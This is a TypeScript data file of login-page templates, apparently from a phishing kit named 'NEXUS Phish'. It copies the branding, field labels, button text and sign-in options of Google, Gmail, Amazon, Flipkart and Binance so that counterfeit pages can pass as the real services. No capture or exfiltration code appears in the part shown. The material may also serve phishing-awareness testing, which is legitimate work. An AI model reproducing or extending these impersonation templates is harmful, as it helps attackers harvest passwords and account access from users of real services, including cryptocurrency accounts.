import { Mail, BarChart4, ShoppingBag, ShoppingCart, CreditCard, Wallet } from "lucide-react";
import { LoginTemplate } from "./types";

export const businessTemplates: LoginTemplate[] = [
  {
    id: "google",
    name: "Google",
    description: "Access your Google account",
    logoUrl: "https://ik.imagekit.io/pangerlkr/NEXUS%20Phish/google.png?updatedAt=1744088916291",
    primaryColor: "#4285F4",
    secondaryColor: "#DB4437",
    usernameLabel: "Email or phone",
    usernameType: "email",
    passwordLabel: "Password",
    buttonText: "Sign in",
    forgotPasswordText: "Forgot password?",
    signupText: "Don't have an account? Sign up",
    category: "business"
  },
  {
    id: "mail",
    name: "Mail",
    description: "Access your Mail account",
    logoUrl: "https://ik.imagekit.io/pangerlkr/NEXUS%20Phish/gmail.png?updatedAt=1744041234567",
    primaryColor: "#D44638",
    secondaryColor: "#AB3329",
    usernameLabel: "Email address",
    usernameType: "email",
    passwordLabel: "Password",
    buttonText: "Sign in",
    forgotPasswordText: "Forgot password?",
    signupText: "Create account",
    category: "business"
  },
  {
    id: "amazon",
    name: "Amazon",
    description: "Sign in to your Amazon account",
    logoUrl: "https://upload.wikimedia.org/wikipedia/commons/a/a9/Amazon_logo.svg",
    primaryColor: "#FF9900",
    secondaryColor: "#232F3E",
    usernameLabel: "Email or mobile phone number",
    usernameType: "text",
    passwordLabel: "Password",
    buttonText: "Sign-In",
    forgotPasswordText: "Forgot your password?",
    signupText: "New to Amazon? Create your Amazon account",
    additionalOptions: [
      { text: "Sign in with OTP", url: "#" }
    ],
    category: "business"
  },
  {
    id: "flipkart",
    name: "Flipkart",
    description: "Login to your Flipkart account",
    logoUrl: "https://ik.imagekit.io/pangerlkr/NEXUS%20Phish/flip.jpg?updatedAt=1742180425571",
    primaryColor: "#2874F0",
    secondaryColor: "#FB641B",
    usernameLabel: "Enter Email/Mobile number",
    usernameType: "text",
    passwordLabel: "Enter Password",
    buttonText: "Login",
    forgotPasswordText: "Forgot?",
    signupText: "New to Flipkart? Create an account",
    additionalOptions: [
      { text: "Request OTP", url: "#" }
    ],
    category: "business"
  },
  {
    id: "binance",
    name: "Binance",
    description: "Log In to Binance",
    logoUrl: "https://ik.imagekit.io/pangerlkr/NEXUS%20Phish/binance.png?updatedAt=1744088916432",
    primaryColor: "#F0B90B",
    secondaryColor: "#1E2026",
    backgroundColor: "#0B0E11",
    usernameLabel: "Email/Phone",
    usernameType: "text",
    passwordLabel: "Password",
    buttonText: "Log In",
    forgotPasswordText: "Forgot Password?",
    signupText: "Don't have an account? Register",
    additionalOptions: [
      { text: "Log In with Mobile", url: "#" },
      { text: "Log In with QR code", url: "#" }
    ],
    category: "business"
  }
];